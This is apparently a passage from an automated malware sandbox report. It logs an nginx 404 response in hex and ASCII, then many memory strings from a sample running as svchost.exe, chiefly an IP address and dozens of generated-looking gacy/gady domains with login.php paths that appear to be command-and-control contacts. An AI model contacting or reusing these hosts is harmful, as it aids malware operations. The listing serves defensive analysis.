Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 11 Nov 2024 17:51:34 GMTContent-Type: text/htmlContent-Length: 548Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 11 Nov 2024 17:51:34 GMTContent-Type: text/htmlContent-Length: 548Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
Source: svchost.exe, 00000002.00000003.2427508592.00000000092AD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://106.15.232.163/
Source: svchost.exe, 00000002.00000003.2427508592.00000000092AD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://106.15.232.163/H
Source: svchost.exe, 00000002.00000003.2427508592.00000000092AD000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2296118472.00000000092AD000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2292203484.00000000092AD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://106.15.232.163:8000/dh/147287063_377283.html
Source: svchost.exe, 00000002.00000003.2427508592.00000000092AD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://106.15.232.163:8000/dh/147287063_377283.htmlSoftware
Source: svchost.exe, 00000002.00000003.2359792353.000000000924A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2360483972.000000000924A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://gacydes.com/
Source: svchost.exe, 00000002.00000003.2726510414.00000000092B6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2360502034.00000000092C1000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2746470521.00000000092B7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2358968663.00000000092C1000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2358089375.00000000092C8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2359102012.00000000092C1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://gacydes.com/login.php
Source: svchost.exe, 00000002.00000003.2513678339.0000000000853000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2311968303.00000000092B6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2322813149.0000000003306000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2542956129.0000000000853000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2310767470.00000000092B6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2513019694.0000000000851000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2499635923.0000000000855000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://gacyfew.com/login.php
Source: svchost.exe, 00000002.00000003.2678962210.00000000092E5000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2760150538.00000000092E4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2693258532.00000000040FD000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2667608142.00000000040FD000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2667583572.00000000092E5000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2665259102.00000000092E4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2667040821.00000000040FB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://gacyfih.com/login.php
Source: svchost.exe, 00000002.00000002.3428370692.00000000092EB000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2919185604.00000000092E4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2379463124.00000000092B6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2380222392.00000000092E3000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.3287645590.00000000092EA000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2908725007.00000000040FB000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2905696441.00000000092E4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.3421967691.00000000040FF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://gacyhuw.com/login.php
Source: svchost.exe, 00000002.00000003.2376137841.00000000092B6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2879404289.00000000092B6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2902106768.00000000040FB000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2884058737.00000000092E4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://gacykas.com/login.php
Source: svchost.exe, 00000002.00000003.2425971822.000000000338B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2237916986.000000000337D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2252938368.00000000008A2000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2427094852.00000000092B6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://gacykeh.com/login.php
Source: svchost.exe, 00000002.00000003.2649333466.00000000092E4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2657780583.00000000092B6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2672508299.00000000092B6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2347333934.0000000000851000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2347614295.0000000000853000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://gacynow.com/login.php
Source: svchost.exe, 00000002.00000003.2347539212.0000000003309000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://gacynow.com/ww16.vofycot.com
Source: svchost.exe, 00000002.00000002.3428370692.00000000092EB000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2919185604.00000000092E4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2380581815.00000000092B6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2380222392.00000000092E3000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.3287645590.00000000092EA000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2913582701.00000000092B6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2908725007.00000000040FB000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2905696441.00000000092E4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.3421967691.00000000040FF000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.3426788667.0000000009235000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://gacynyh.com/login.php
Source: svchost.exe, 00000002.00000003.2329963433.0000000003319000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2328865580.0000000003315000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2329926664.0000000003317000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2546812858.00000000040F5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://gacypyz.com/
Source: svchost.exe, 00000002.00000003.2337886081.00000000092C7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2329364841.00000000092BD000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2337007716.00000000092BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2607855494.0000000003363000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2330522610.00000000092C6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2335731822.00000000092BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2609571355.0000000003368000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2329969836.0000000003360000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://gacypyz.com/login.php
Source: svchost.exe, 00000002.00000003.2337886081.00000000092C7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2337007716.00000000092BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2601374159.00000000092B6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2571444797.00000000092B6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2335731822.00000000092BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2612862437.00000000092B7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2332264267.0000000003378000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://gacyroh.com/login.php
Source: svchost.exe, 00000002.00000003.2853017937.000000000085D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://gacyryb.com/
Source: svchost.exe, 00000002.00000003.2397665900.00000000092E5000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2425745567.00000000092E4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2422762232.00000000092E3000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2178331950.00000000008A3000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2178415911.00000000033F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2513835440.00000000092E4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2499628727.00000000092E4000.00000004.00000020.00020000.00000000.sdmp, PMnAVsjMPucERAKEWNFImySCFHoLk.exe, 00000006.00000002.2604863482.00000000010D0000.00000004.00000020.00020000.00000000.sdmp, PMnAVsjMPucERAKEWNFImySCFHoLk.exe, 00000006.00000002.2604863482.00000000010A3000.00000004.00000020.00020000.00000000.sdmp, PMnAVsjMPucERAKEWNFImySCFHoLk.exe, 00000007.00000003.2572564754.0000000000FB2000.00000004.00000001.00020000.00000000.sdmp, PMnAVsjMPucERAKEWNFImySCFHoLk.exe, 00000007.00000002.2718258067.0000000008D8F000.00000004.00000001.00020000.00000000.sdmp, PMnAVsjMPucERAKEWNFImySCFHoLk.exe, 00000007.00000002.2744689381.0000000009396000.00000004.00000001.00020000.00000000.sdmp, PMnAVsjMPucERAKEWNFImySCFHoLk.exe, 00000007.00000003.2558068199.0000000008D9F000.00000004.00000001.00020000.00000000.sdmp, PMnAVsjMPucERAKEWNFImySCFHoLk.exe, 00000007.00000002.2613849314.0000000000F68000.00000004.00000020.00020000.00000000.sdmp, PMnAVsjMPucERAKEWNFImySCFHoLk.exe, 00000009.00000002.2671362092.00000000086C1000.00000004.00000001.00020000.00000000.sdmp, PMnAVsjMPucERAKEWNFImySCFHoLk.exe, 00000009.00000002.2608350004.00000000007DF000.00000004.00000020.00020000.00000000.sdmp, PMnAVsjMPucERAKEWNFImySCFHoLk.exe, 0000000B.00000002.2614917822.00000000014D8000.00000004.00000020.00020000.00000000.sdmp, PMnAVsjMPucERAKEWNFImySCFHoLk.exe, 0000000B.00000002.2614917822.00000000015A9000.00000004.00000020.00020000.00000000.sdmp, PMnAVsjMPucERAKEWNFImySCFHoLk.exe, 00000013.00000002.2640207678.00000000013B4000.00000004.00000020.00020000.00000000.sdmp, PMnAVsjMPucERAKEWNFImySCFHoLk.exe, 00000013.00000002.2866504343.000000000A29D000.00000004.00000010.00020000.00000000.sdmp, PMnAVsjMPucERAKEWNFImySCFHoLk.exe, 00000013.00000002.2756051050.000000000914B000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://gacyryw.com/login.php
Source: svchost.exe, 00000002.00000003.2649333466.00000000092E4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2347178577.0000000003322000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2349507832.000000000332F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2349422845.000000000332C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2347333934.0000000000851000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2347614295.0000000000853000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2347613705.0000000003325000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://gadycew.com/login.php
Source: svchost.exe, 00000002.00000003.2376137841.00000000092B6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2885524752.0000000003360000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2376391418.000000000331E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2902106768.00000000040FB000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2376466077.0000000003325000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2375586174.000000000332D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2379454788.000000000332F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2375980019.0000000003321000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2377198818.000000000332F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2376798591.0000000003325000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://gadydow.com/login.php
Source: svchost.exe, 00000002.00000003.2337886081.00000000092C7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2337365737.0000000003363000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2337520424.0000000003368000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2337007716.00000000092BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2337073481.0000000003360000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2336882213.00000000092B6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2335731822.00000000092BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2589419124.00000000033EA000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2335731822.00000000092B6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2337007716.00000000092B8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2336470104.0000000003356000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://gadyfob.com/login.php
Source: svchost.exe, 00000002.00000003.2337886081.00000000092C7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2329364841.00000000092BD000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2337007716.00000000092BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2327922219.00000000092C0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2330522610.00000000092C6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2335731822.00000000092BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2547959760.00000000092E4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://gadyhyw.com/login.php
Source: svchost.exe, 00000002.00000003.2726510414.00000000092B6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2760150538.00000000092E4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2746470521.00000000092B7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://gadykyz.com/login.php
Source: svchost.exe, 00000002.00000003.2397665900.00000000092E5000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2425745567.00000000092E4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2422762232.00000000092E3000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2185076169.00000000033EF000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2388042380.00000000092C0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2387081098.00000000092B6000.00000004.00000020.00020000.00000000.sdmp, PMnAVsjMPucERAKEWNFImySCFHoLk.exe, 00000006.00000002.2604863482.0000000001098000.00000004.00000020.00020000.00000000.sdmp, PMnAVsjMPucERAKEWNFImySCFHoLk.exe, 00000006.00000002.2622033644.0000000008E90000.00000004.00000001.00020000.00000000.sdmp, PMnAVsjMPucERAKEWNFImySCFHoLk.exe, 00000007.00000002.2718258067.0000000008D8F000.00000004.00000001.00020000.00000000.sdmp, PMnAVsjMPucERAKEWNFImySCFHoLk.exe, 00000007.00000003.2558068199.0000000008D9F000.00000004.00000001.00020000.00000000.sdmp, PMnAVsjMPucERAKEWNFImySCFHoLk.exe, 00000007.00000002.2613849314.0000000000F68000.00000004.00000020.00020000.00000000.sdmp, PMnAVsjMPucERAKEWNFImySCFHoLk.exe, 00000009.00000002.2671362092.00000000086C1000.00000004.00000001.00020000.00000000.sdmp, PMnAVsjMPucERAKEWNFImySCFHoLk.exe, 00000009.00000002.2608350004.0000000000802000.00000004.00000020.00020000.00000000.sdmp, PMnAVsjMPucERAKEWNFImySCFHoLk.exe, 0000000B.00000002.2614917822.000000000154E000.00000004.00000020.00020000.00000000.sdmp, PMnAVsjMPucERAKEWNFImySCFHoLk.exe, 0000000B.00000002.2745540362.00000000093CD000.00000004.00000001.00020000.00000000.sdmp, PMnAVsjMPucERAKEWNFImySCFHoLk.exe, 00000013.00000002.2640207678.0000000001363000.00000004.00000020.00020000.00000000.sdmp, PMnAVsjMPucERAKEWNFImySCFHoLk.exe, 00000013.00000002.2756051050.000000000914B000.00000004.00000001.00020000.00000000.sdmp, PMnAVsjMPucERAKEWNFImySCFHoLk.exe, 00000015.00000002.2856769526.0000000008FC3000.00000004.00000001.00020000.00000000.sdmp, PMnAVsjMPucERAKEWNFImySCFHoLk.exe, 00000015.00000002.2676238100.00000000010C5000.00000004.00000020.00020000.00000000.sdmp, PMnAVsjMPucERAKEWNFImySCFHoLk.exe, 00000015.00000002.2856769526.0000000008F91000.00000004.00000001.00020000.00000000.sdmp, PMnAVsjMPucERAKEWNFImySCFHoLk.exe, 00000015.00000002.2676238100.00000000010BA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://gadyniw.com/login.php
Source: svchost.exe, 00000002.00000003.2853017937.000000000085D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://gadynub.com/http://volykek.com/http://qebytuv.com/
Source: svchost.exe, 00000002.00000002.3428370692.00000000092EB000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2919185604.00000000092E4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2414263063.00000000033CA000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.3287645590.00000000092EA000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.3408110880.0000000000855000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2388405607.00000000033C0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://gadypub.com/login.php
Source: svchost.exe, 00000002.00000003.2337886081.00000000092C7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2329364841.00000000092BD000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2337007716.00000000092BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2327922219.00000000092C0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2607855494.0000000003363000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2330522610.00000000092C6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2335731822.00000000092BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2609571355.0000000003368000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://gadyquz.com/login.php
Source: svchost.exe, 00000002.00000003.2346403174.00000000092BD000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2346603921.00000000092BD000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2635305989.0000000003360000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2356885542.00000000092C6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2346691543.00000000092BE000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2356000937.00000000092BE000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2349309789.00000000092C7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://gadyvis.com/login.php
Source: svchost.exe, 00000002.00000003.2678962210.00000000092E5000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2693258532.00000000040FD000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2667608142.00000000040FD000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2667583572.00000000092E5000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2665259102.00000000092E4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2356885542.00000000092C6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2667040821.00000000040FB000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2356000937.00000000092BE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://gadyzib.com/login.php
Source: svchost.exe, 00000002.00000003.2509683984.0000000003368000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2513678339.0000000000853000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2511691560.0000000003325000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2322419492.00000000092B6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2311325697.000000000338E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2530049232.000000000332A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2311968303.00000000092B6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2527939785.0000000003368000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2498534049.0000000003331000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2511442886.0000000003330000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2542956129.0000000000853000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2523187509.0000000003363000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2310767470.00000000092B6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2513019694.0000000000851000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2512099666.0000000003360000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2506997946.0000000003363000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2499635923.0000000000855000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2310062012.000000000338B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2511409546.0000000003323000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 